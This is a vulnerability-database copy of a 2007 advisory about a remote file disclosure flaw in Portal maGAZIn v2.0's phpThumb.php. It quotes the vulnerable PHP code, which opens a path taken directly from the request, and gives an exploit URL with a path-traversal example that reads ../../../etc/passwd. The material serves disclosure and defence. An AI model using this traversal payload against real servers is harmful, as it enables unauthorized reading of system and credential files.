Lucene search

K

magazin-disclose.txt

๐Ÿ—“๏ธย 16 May 2007ย 00:00:00Reported byย Dj7xplTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

Portal maGAZIn v2.0 Remote File Disclosure Vulnerability in phpThumb.ph

Show more
Code
` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo---------------------------------------------------  
  
[ Y! Underground Group ]  
[ [email protected] ]  
[ Dj7xpl.2600.ir ]  
  
----ooooO-----Ooooo--------------------------------------------------  
( ) ( )  
\ ( ) /  
\_) (_/  
  
---------------------------------------------------------------------  
  
[!] Portal : maGAZIn v2.0  
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php  
[!] Type : Remote File Disclosure Vulnerability  
  
---------------------------------------------------------------------  
  
---------------------------------------------------------------------  
  
Vuln Code : Line (152 - 157)  
  
[Code]  
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {  
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));  
fclose($fp);  
} else {  
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);  
}  
[/Code]  
  
---------------------------------------------------------------------  
  
---------------------------------------------------------------------  
  
Bug :  
  
http://[Target]/[Path]/phpThumb.php?src=[Local File]  
  
Example :  
  
http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd  
  
---------------------------------------------------------------------  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report